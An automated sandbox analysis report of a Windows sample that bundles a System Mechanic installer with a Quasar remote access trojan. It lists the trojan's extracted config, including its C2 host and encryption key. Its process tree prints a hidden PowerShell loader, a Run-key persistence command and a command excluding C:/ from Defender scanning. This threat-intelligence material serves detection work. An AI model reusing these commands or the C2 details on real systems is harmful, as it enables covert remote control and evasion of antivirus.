Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    06-06-2024 13:42

General

  • Target

    3c3709b1034ea2023c6a40a2f2c66f27e63000b5f3f398ff11a71da44a2969ff.exe

  • Size

    69.1MB

  • MD5

    9c0e635401b0bc6bb9f32bf61c831309

  • SHA1

    1ba8408785b86eea68702003b200822f2b8768ad

  • SHA256

    3c3709b1034ea2023c6a40a2f2c66f27e63000b5f3f398ff11a71da44a2969ff

  • SHA512

    d8adf0313061d1f9a32bc00fbdc9f414cc117e2017101bdcba7da34a3b124d759fbc029d62eb62aa89a135b964e33610e62d3b7a90200126578f7e2687b4b870

  • SSDEEP

    1572864:YVo7Cqx85SMJ/A/8Ww5XF6aC0TIOR6+m8YKF60K7H:6o21/AUB5XF8WIOR6+PO0KL

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

iSpring Suite

C2

dragons.4cloud.click:1982

Mutex

rAok3Bn91dJeJbDXOl

Attributes
  • encryption_key

    1KJfoF8pVLBGtN9uzB0i

  • install_name

    Client.exe

  • log_directory

    4K

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 17 IoCs
  • Modifies system executable filetype association 2 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 17 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c3709b1034ea2023c6a40a2f2c66f27e63000b5f3f398ff11a71da44a2969ff.exe
    "C:\Users\Admin\AppData\Local\Temp\3c3709b1034ea2023c6a40a2f2c66f27e63000b5f3f398ff11a71da44a2969ff.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Users\Admin\AppData\Local\Temp\SystemMechanic_Ultimate_Defense.exe
      C:\Users\Admin\AppData\Local\Temp/SystemMechanic_Ultimate_Defense.exe
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe
        "C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe" pgfilter
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:752
      • C:\Program Files\iolo technologies\System Mechanic\incinerator.exe
        "C:\Program Files\iolo technologies\System Mechanic\incinerator.exe" /regserver
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Registers COM server for autorun
        • Checks SCSI registry key(s)
        • Modifies registry class
        PID:2192
      • C:\Windows\System32\netsh.exe
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=ioloTrayApp dir=in action=allow program="C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe" enable=yes
        3⤵
        • Modifies Windows Firewall
        PID:788
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.iolo.com/landing/thanks-for-installing-system-mechanic/?utm_source=smud&utm_medium=product&p=a50de83f-efec-48d0-b4dc-3e98620fc509&pg=bf06aa46-be9b-4ecb-94f1-047d8c0a149f&b=00000000-0000-0000-0000-000000000000&e=11a12794-499e-4fa0-a281-a9a9aa8b2685&l=en&sn=&appver=24.0.1.52&inapp=0&utm_campaign=3
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3040 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2668
      • C:\Program Files\iolo technologies\System Mechanic\iolo.exe
        "C:\Program Files\iolo technologies\System Mechanic\iolo.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe
          "C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:596
        • C:\Windows\system32\regsvr32.exe
          "regsvr32" "C:\Program Files\iolo technologies\System Mechanic\Incinerator.dll" /s
          4⤵
          • Loads dropped DLL
          • Modifies system executable filetype association
          • Registers COM server for autorun
          • Modifies registry class
          PID:1664
        • C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe
          "C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1612
    • C:\Users\Admin\AppData\Local\Temp\Afhandlinger.exe
      C:\Users\Admin\AppData\Local\Temp/Afhandlinger.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -windowstyle hidden "$defeatists=Get-Content 'C:\Users\Admin\AppData\Local\Temp\gesjftigeres\tholeite\fingerable\Strategier\Gabrielle.Sel0';$Preregulating=$defeatists.SubString(37841,3);.$Preregulating($defeatists)"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetchy" /t REG_EXPAND_SZ /d "%Aortographies% -windowstyle minimized $Wrestling=(Get-ItemProperty -Path 'HKCU:\Beskyldning\').Strandboernes;%Aortographies% -windowstyle minimized ($Wrestling)"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:656
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetchy" /t REG_EXPAND_SZ /d "%Aortographies% -windowstyle minimized $Wrestling=(Get-ItemProperty -Path 'HKCU:\Beskyldning\').Strandboernes;%Aortographies% -windowstyle minimized ($Wrestling)"
              6⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:2480
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell" Add-MpPreference -ExclusionPath C:/
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files\iolo technologies\System Mechanic\ACResources.dll

    Filesize

    599KB

    MD5

    af7b07ad92b0f2e7653aa83017dc58e1

    SHA1

    2c35bd2cfc632d9305b6b6d6bc39785d5a18cb07

    SHA256

    f150bc78c52b926748f890be86b916ba98bed29ad3573ae572283ba22bcbfee9

    SHA512

    2923a95421a02629244d59740672888ecf9c5f16a1fb728bdcd0fc6a6cc70a572b96a06419f808b2b93bff971c0518c07e68301c18309f5379c1bceccdd9b00e

  • C:\Program Files\iolo technologies\System Mechanic\DotNetZip.dll

    Filesize

    471KB

    MD5

    22cc601e2e4c1ba16181453689bd00c7

    SHA1

    78b48b9621f498ccbb3eb40c49855d880d0a1ef0

    SHA256

    4471f5c4cd0490df6671e82614967422ba7ec91b813850e86b5d9a446e91e426

    SHA512

    9492bf4e697660df91ca696fe68896ae375c815d691a7fd25a92768be5b64ee8c084d2fd1bd146db60cf5c21ab57f723c72caa4566fd7aedcca9e6b85ba56cb0

  • C:\Program Files\iolo technologies\System Mechanic\EndpointProtectionClient.Net.dll

    Filesize

    90KB

    MD5

    a26a37505f094367b1f59585a44310b1

    SHA1

    6bc11e681b693802b159cc0b3f81d23a1ef02f0e

    SHA256

    b6dc600b2c91f1607fbd8fa13c3d8fa0f1f51f6cfee1a4d489025b650e698b39

    SHA512

    803d8ebcd5cff56ed2cc2949485be42a850812f113bac0b9ee66cc29364214bc482dd5a4a1d80a805686e1380b57ad0628e7524d9c44ddc5956ae8ba8c38f58e

  • C:\Program Files\iolo technologies\System Mechanic\EndpointProtectionInterfaces.dll

    Filesize

    99KB

    MD5

    4e12a037bfa3c33ff67ffd1a6e6a7309

    SHA1

    6a75106b90c679e7da6f387db6caa437c79e995d

    SHA256

    4d811ec13f61efba06e797671e8eb0188f9072b5059251eba418a1e6e6e626af

    SHA512

    f22e5cf405f54b3dc77a368745d4503a8c0b8d7780404b74eae446eb6a3cba99e36bc35479408d7a6586206dcf78c9022ed99dd0648113b54fb42de2e1a9d336

  • C:\Program Files\iolo technologies\System Mechanic\EntitlementDefinitions.dll

    Filesize

    125KB

    MD5

    783efd3e7f292424358a526c5ea3ee67

    SHA1

    c953b99c77b416749161658c476d47cf2c687a73

    SHA256

    314a86a28cc956f40b412920b1c4722562ef648ea712d3f35ff59846d845e781

    SHA512

    ca511e8779f0c6b257659ddd1a42a7e929107aae2674a5e33002445e8c02d60232296103adea8dfba61bc26a19877cc2a58652ddd8d69aba9438225f0f177351

  • C:\Program Files\iolo technologies\System Mechanic\MessageRpc.Net.dll

    Filesize

    58KB

    MD5

    eaa84840d1d941c4902e2d66dab0e12d

    SHA1

    4b3e8dd5c1096a15fd01f035a8bc589b238e3851

    SHA256

    47f8b8e2f8764cadf8531e35c2171e3ea084f2216932fb94d99243bbb507c88c

    SHA512

    34d43b8f0cd594c396e3602242cf9e97ae32b892d2ae8d08ff6913f75ca6f0b87fb132261dbd1c474f204c66e3d67246c0e3262b1f111cbfb3efc5b7eb524ed7

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.AI.ServerTelemetryChannel.dll

    Filesize

    119KB

    MD5

    9bfe59d2c751d1e7c995111e1571da0b

    SHA1

    331379c17cc69c0f3a4ff7e6969f0e2a3c55a6ee

    SHA256

    182ee364c9ff421c04c26ef537791e7d83d8f615c95d5b0374a8197836b6aeb3

    SHA512

    e94a5d1c750afbb32b453f131b897882d22e03c7364ff65a17fd090e71c30590758d4f6f43bdccd8f8ba146eb9a0f12a1dc8c530c0b94994054d2c2a9fe79bd7

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.ApplicationInsights.dll

    Filesize

    377KB

    MD5

    1ee57089b208e9f12317d509e9a18e07

    SHA1

    a7745e69b3d921b900a1e850ac10916a82d60105

    SHA256

    dd0951ad341e6ee453d0cc40ee4ff4969848885ea773d7a282a862abf7abf159

    SHA512

    557670a9e017dbe0f1382a9f528e9e53955ca2fe203f800420b671db401fc19dd951a288f7c0a187b33e486f0c589b719a64aceb8766a7a53f1d5b590ac3ef3c

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.Identity.Client.dll

    Filesize

    1.6MB

    MD5

    fb228beba97cabd51b9e4a6099d55fca

    SHA1

    5e695d4e3a5e093224e568893ac22f937ef94517

    SHA256

    188f56cab17be6cb005252f3029be213c027a17e33b8e89a43643ddcd78fff96

    SHA512

    f20ac02fed4c79368bb3da058bbe4cc07940a2825921223494d80779e681cbd4748ce5c87b65f84832eb6db19570bdeb1049e134004530bc094eb8ee3deb14e6

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.Practices.Prism.MefExtensions.dll

    Filesize

    38KB

    MD5

    1c4b7b8b9cd1c6672016fe5220c6f41f

    SHA1

    2e76a7d17655ad7068120191d9d8f1b6fd497736

    SHA256

    51b59720c5aefef16bc277e8aa4810da540ea3c976a44d4a42ab0fe3a3915abc

    SHA512

    b36a942516c29cbeb6b2143cce7135baf60e88bc1f3eff00ba8193220063bf042c7f12a65e6928c69acb7db9258511f0b9a1b1097666df6c3ae663046128dabc

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.Practices.Prism.dll

    Filesize

    147KB

    MD5

    2a532749f77d7ef8c54798b5c5d4105f

    SHA1

    2e73508b69d5fb8a8c60a19a4155703c18255afe

    SHA256

    f1043059a9a6630d152bb6a56effb3f1e295546ab4cf791487762571866b740f

    SHA512

    cc607232db9e354c6728a9d150a111fdac8ca6f5a0ad3bb644b72b3336f6c39836004eea06ddc7dcf7bc1b30cac72a3d7f83ab2d7217ad4cd409b6e8ba1f0518

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.Practices.ServiceLocation.dll

    Filesize

    29KB

    MD5

    6df78bb163d443d95b21f58808320af7

    SHA1

    a0263ec61435d1ee4c18a92a06ac3ea2c42eb730

    SHA256

    79e7be6be7509a1a5263f0292f1462a57744a7c52c4da6475c70a5054d08c327

    SHA512

    d10510ec52c57061ab8c516b30b6fdc1a4602def69482ee0e230e1a161d7a08ca98280ba71478668c36c541d4ef944b17132db46a8d7298dd1f4749add61d372

  • C:\Program Files\iolo technologies\System Mechanic\Microsoft.Win32.TaskScheduler.dll

    Filesize

    234KB

    MD5

    69f5b8f16afa0e00862f442401aed9ee

    SHA1

    3ba5a721be48a244b4fbfa5a54eaf0c33625648c

    SHA256

    bb9f7254ec7d7107a4cdc2f0b63e9f6bdfe28767060ff91b939cc12746e56d29

    SHA512

    eec8b816eecb07234c409057d2fc5ca89a942949ca4c6ed8179447723393fd0c88cd773d4e9ecbb568073013c0275ccd66307b94111e016d90f6444a772fba8d

  • C:\Program Files\iolo technologies\System Mechanic\Newtonsoft.Json.dll

    Filesize

    695KB

    MD5

    195ffb7167db3219b217c4fd439eedd6

    SHA1

    1e76e6099570ede620b76ed47cf8d03a936d49f8

    SHA256

    e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

    SHA512

    56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

  • C:\Program Files\iolo technologies\System Mechanic\SDKModels.dll

    Filesize

    591KB

    MD5

    bd1a7840c9ded5cb20b587c389b1ec92

    SHA1

    1f3d771ca49cb05cab8994d703c5f67390c4c0d6

    SHA256

    7a1232ad71b1172d08a4f218d7078417b086465eaa3b90c12a6d344dddaa419a

    SHA512

    be4fd68c78b0a896c0c1bfa0b075decdb309adbfdeb99da2fc87bdc62321563bc8fcebf95f3bd9283086c19af73308c439efdd6a565458ee55421d7a63dfa61e

  • C:\Program Files\iolo technologies\System Mechanic\SMCommon.dll

    Filesize

    1.0MB

    MD5

    b8902ce2804534c4fb560161b7faea59

    SHA1

    381b5f7e55d0b504562e58c2ea18bdeb5139c49e

    SHA256

    7bc5416af877936c0324476cb6a1e0b50ddbbd7469e1f37c67367af1d0c4a2a3

    SHA512

    e8281c0e93b566f653f24126f8884cedc7ff3a401d746976399571e63563574c8acd1f7f63647bfe4ad697d588c1f2de2a59b6402714a9a73af57aef2bfce425

  • C:\Program Files\iolo technologies\System Mechanic\SMInfrastructure.dll

    Filesize

    8.3MB

    MD5

    db6a27a9f9a56a5fa66712dba8e644a6

    SHA1

    81cf5591075cabbafac03c392b0648eb9b285582

    SHA256

    433c8ad03f741b381d79f4e2750824d556178d8d5f209e3919e69c91921b65fb

    SHA512

    68c9c27d5c5f84af61a888ce68cdf9697715f0c4e2901c3447abd00b5972b04916e1f00e54e9b117410e843878f7ba6c08869c525f44ff77658805db62ff93b7

  • C:\Program Files\iolo technologies\System Mechanic\System.Diagnostics.DiagnosticSource.dll

    Filesize

    184KB

    MD5

    faef01b70b8e775a92d4b9e2383f2749

    SHA1

    a35b2fb5fb243319ac4c9b776dad416d76d3aeea

    SHA256

    c8a5ca93d8e40dafd48759226f70f90af8ccbc3a8df45d4e6fd5dc5626b05ab9

    SHA512

    c4b482e1249555f9dabbee97b030792617a250362aef175dfd9877a875808a9e91278ff6d3cfac04730a8e919095f01a4c27254a94191433704dbbd6d7a78ab8

  • C:\Program Files\iolo technologies\System Mechanic\System.Net.Http.dll

    Filesize

    193KB

    MD5

    e4b20eceadd0a1d030b407b02b913ebf

    SHA1

    bd1bfad57bbafe2b96fe72fd9fa791d5784290cb

    SHA256

    f48e85c97f8e473240db925d00ee871be9e2e7b684b313b911d5c2c14c47078a

    SHA512

    95b5819c9c27b123ff9c6a8a8703b6bd8857c006c67035d62c4ea58acda41266bc8a8c43847a010d28e4dd5195b04cf0d1dc409f0ce7d5bf59b36cd5d6845622

  • C:\Program Files\iolo technologies\System Mechanic\SystemShield.dll

    Filesize

    310KB

    MD5

    b75ec9317947076d38e274a07d1afc8e

    SHA1

    1b81a764f3c1ac71306f0d82c2244cd0f691915c

    SHA256

    08e964778e2fd28dbfc1186915d809cea84c9af3bbea07f45a6d0326e1aaf180

    SHA512

    7f2251330e94460fdf4851669f6ceea0c0a25ffee92c1619dd245ea9a3ecf8de4f47fd1b777f26aa9d636a9caa94de035b548e87db3b08e4a843b7070d8e27b2

  • C:\Program Files\iolo technologies\System Mechanic\ToolKit.Interop.dll

    Filesize

    24KB

    MD5

    35b1ff58fcadf2d8933f0615968f1b46

    SHA1

    4ff382514eecfc50800d5025da80175670346b5e

    SHA256

    3620ae00d315397ec464d1a4ded9eb55046efd32cc75e287b9f494c7d256f222

    SHA512

    141bd0c3e95987701b557516e7613baa7ad987cce13a4c623189e2742d7ea203f25e21942c24360aafe252a2feb924dc4c7c89cf85ba0893276e8730a39f632e

  • C:\Program Files\iolo technologies\System Mechanic\UIResources.dll

    Filesize

    6.5MB

    MD5

    a3dbc556c029f3ece9f7d1a40e2f2cd1

    SHA1

    ba1278593d66e677c586be5526bca7a60be3cc1b

    SHA256

    37617dc0ebe5f261262e98e61837fbe460009dccdcb0f6eaed51f9f0b1a2a785

    SHA512

    86a9e3df06f1e0fd05a8f676a9c5ddd01076265809fcb5528d5e0b0f3cceeeae4623c52813266dc2c59a3a0544bb9fc52cd868d29f5ea0f861b5cb3bae62fd36

  • C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe

    Filesize

    48KB

    MD5

    92a6df47283b49b207045fa7a4502bc1

    SHA1

    718e9ff5f0fd9143de4f8fcf135d78165f991e9d

    SHA256

    d714695c9775bd7dbb1fa40882bbe03216acb3994b94514a68892454eada0358

    SHA512

    f2b08a4ae33e87a786fe25a2d902c8acb002faa4893a1f21d5608cbe070477af1b9c553c8960486a65089ad1e0be1491cb93cc60da9f3394c893525fa075d645

  • C:\Program Files\iolo technologies\System Mechanic\btscan.dll

    Filesize

    30KB

    MD5

    f3fbbf03cf1231fdee90331f55b3886d

    SHA1

    ffa8952867916999ff5353466650ed226b99d31a

    SHA256

    5bf16e0b5084ca5e68bb1b4e2e087fa5d45d2dd7dedf58057a7a53cb73dd266f

    SHA512

    0afc3926996230dd943b64899136bb8e080dfe8a06dd4dfac161ec2d32c1db6a2dedd95cfae19e49ba8c70e7311e3ca52fb81b7c1397d24236116e148e15ba31

  • C:\Program Files\iolo technologies\System Mechanic\iolo.exe

    Filesize

    4.2MB

    MD5

    f7b41f2d1093a9050e9642a1ff8cd56b

    SHA1

    667dfe97dd3cbaee88d5f4e908ccfd8940e59de5

    SHA256

    ac3976da509cafffba007fa782b3193bebd8e444868b8a8c354cb5343e970aff

    SHA512

    df90070cd96261cec7c5c58f71a9f39b9a6649721dd06583cede21b154802732daa90869c145ee77140e441f89f32f92305ed1a07ba90e0c87f14a1a62554ced

  • C:\Program Files\iolo technologies\System Mechanic\iolo.exe.config

    Filesize

    6KB

    MD5

    674b6821636f8da9c95e6b1ca6d53510

    SHA1

    c1906d93b96527e962eb8a3d9a8193d99b42060a

    SHA256

    4c4127714365d39797bf1da6cc6b269d2599fb66fbdb957dba71a3329ebae417

    SHA512

    4c49dd52c48606eb68393f56998b69d991602b061c570163d6f25a6ae5aaf3bed4d3b4b77bbd79939d1986e755e44a0f0f8f5c6846cd5900c572c87d560cbdf7

  • C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe

    Filesize

    1.7MB

    MD5

    d02efcc9790421cebab9a09bf1f7c2e6

    SHA1

    38ba527acfef8efa9a9a612eb3ddf29fee04391c

    SHA256

    f3912beeb776790a657dacb62da4ea88fe92076f9146c46eeeec90f6a0938987

    SHA512

    bc35eaa331bafd1c5c2e79b20c3a06736a5739fc7c3eb55f6bbb3f8a47edffccd54e5f3b35ddebdb6eaa6a695fbc824d0b707ee05b7392a9579b9211ee7432ff

  • C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe.config

    Filesize

    5KB

    MD5

    d07521206ed9244754356a6d495ca10f

    SHA1

    331c8481d9f360e0107b34b007aa1dd41414adb4

    SHA256

    507a6682dad955fe21d7d982844c4ec73a27f40f0bdd0425560ea87e9c19a239

    SHA512

    ed8905b2483f251d6f9b7fa9728adb9c16b66eafadb51fd72f8088417fda16ad13714f74118f4d790e01537f1b3c005b254a0048a3cbc4671fa910efcbf4faf7

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iolo\System Mechanic.lnk

    Filesize

    1KB

    MD5

    dcf99fb08cee63e476aa9f56bc361ab2

    SHA1

    860c5b5d1b69f89c435996892171b08e79e98cf1

    SHA256

    b3cf6bd09f7bd0544ba4ba7cd135c5550f5c5f0a95bcb87b042b31d3631393ea

    SHA512

    23f4efb792c6ea168f345ccdfbc542b375517f1b129fd9988d703e4412a479826ed65eb4115f5c0725d80d4027d171912c338167e219807f695d6cba3c4da9d7

  • C:\ProgramData\iolo technologies\iolo\AppData.idb

    Filesize

    58B

    MD5

    3491f2167b114aa02e394d7a7617dfb3

    SHA1

    18197628f7326ddea29bef2eb17c67eabf588236

    SHA256

    7323e0837c7d08b5dccf233b6498492cb33abedbc6318f20df4876908d7a27fa

    SHA512

    c04e0c574ccc082dcc116de4958c5ea46e9ff71e66fc11d0f073a0730e5deb9477ebecf5755b1f54d767c1c78a50cb26c122db7a5d3d43216f6e2ee380691fbe

  • C:\ProgramData\iolo technologies\logs\bootstrap.log

    Filesize

    4KB

    MD5

    137f24204d0b7e11e60debec38adcfcd

    SHA1

    64fa18d99e1c77049ac9514ac830995c03f3746e

    SHA256

    8ea54f240ed662fc0fe31a0811f1418b8c5353bf8dd92fd76c3103f4883f6866

    SHA512

    47ed7ad901f82eb35c5d772f502026ca85fab39ae8f95f2db982e8ce9f8ce50467da15ca9020a3e7a99c65b596f5db568d2f5dfc5736d55aadc305f94146df5a

  • C:\ProgramData\iolo technologies\{97653814-8BC4-4439-BF04-07D054443D89}\access.dat

    Filesize

    25B

    MD5

    d4b65e291a0a2f9b37ff56e345599aca

    SHA1

    4f1b230effde1af0aa5dac6724ef242cad0e6afb

    SHA256

    41b577540b4810cc73a7a8b0fe1ad37b2396d604329f9d502009464e108f6ece

    SHA512

    487b204e6ba56ef757092adace04bc55151cdfd58f3071f6194dc77d8c5735a633258367800ecd242dd3d009ea123567731f2431fffc2ad06280f40f0a16a286

  • C:\ProgramData\iolo technologies\{97653814-8BC4-4439-BF04-07D054443D89}\pg_trackers.dat

    Filesize

    95KB

    MD5

    165eeecd5628448aaeb740d3c4add2e6

    SHA1

    b1c5b46e1529af3706d2b8f356d2e0934d94ff96

    SHA256

    b149154ff94bb44d89937d533dbd1facf0c7a4cf1eaafa7da785736edff68a7b

    SHA512

    60ed577d5de651754a8f962003d47de0f9c7dde31dd6f4d918461b62b214f8f11a5ba6b7d75419931bc855bcff5d8f214efa3214f12b233d94ca3daed42d097d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    662474f1c80b5424878d4ba7b9dddd4f

    SHA1

    002f51448fa6b3b058b9322d89cdfa647b06268d

    SHA256

    9632cab3f11b8f336798cb1397a9e9ba840cb26be0fca5c807ba62326bc0a446

    SHA512

    a9f9704929bf43f2f036b8ec84971173872b484491bdde49d8007a7b86aaa53c600fd879d4510fd0b9298ddf58c054d9e6456dc4de97681cf417bf5593026147

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7aba15079974fad4ac1d9b6d38612ffb

    SHA1

    fea2d8b8ab186452662dc969d448677e941461d8

    SHA256

    5cebf6619df8ee47a50d3492532ba3e64da8a079feb296baef27c974a50d826c

    SHA512

    1a36cd31c0c38bb9cfdbc6f50e761a3232db97322e118820d2b1b9fd9879cf421da0693e9ca92f9ff8906b045e4c39dc6ea2063221cb79e5a9a321138a924618

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    16f6a4e76925d6d0fb516f6b676c1a92

    SHA1

    d2fd269d330e4a753bf698161fb7b0c5402ad62e

    SHA256

    1ffbc99ec18b52e623fc4e9c12df51d9d6375adb94a25582e58cb32d828e0f6a

    SHA512

    5de91797e188079458d88ca0cb6384ec63df739f5d57bb530fd1b7289eb12106472b30dad50e1b61ea73242dfd2e76cbee9a16b24e76a20e79921f0ffa7d2646

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4ec02f4acdd20701064a2b9aa1c741dc

    SHA1

    94243c7e3066900bb2ac07f29af23878d2146c88

    SHA256

    517aaa7b1d6bd2f70900fbb67c8f7ae830a10fc6da944f541b32178db737db5b

    SHA512

    7809535ecf1a21b409ae00aaf2b328cd72c2294fa196619e24c00f92e7459f70a8592c16eb7d69c32af03bf45dc9c5b0b5dcb7ec892af9b1bbd895354dac7c5c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    ddcfbd1f92d227acb4d1a99ed01e3458

    SHA1

    4c4f07ca682709077939f3cb640c9e11f5510049

    SHA256

    2471d3349e867f72624683f45c1a8648bfab6ec1c71ce25ec66d97d3d7669f02

    SHA512

    fefb0e90ce45b32737f88dd4bea525e4da239c201283fbc93f4d877aedaf5a2fa78146475f0020088193c8824f934af26c221210f76828a4fa5a8cda68a27a7c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

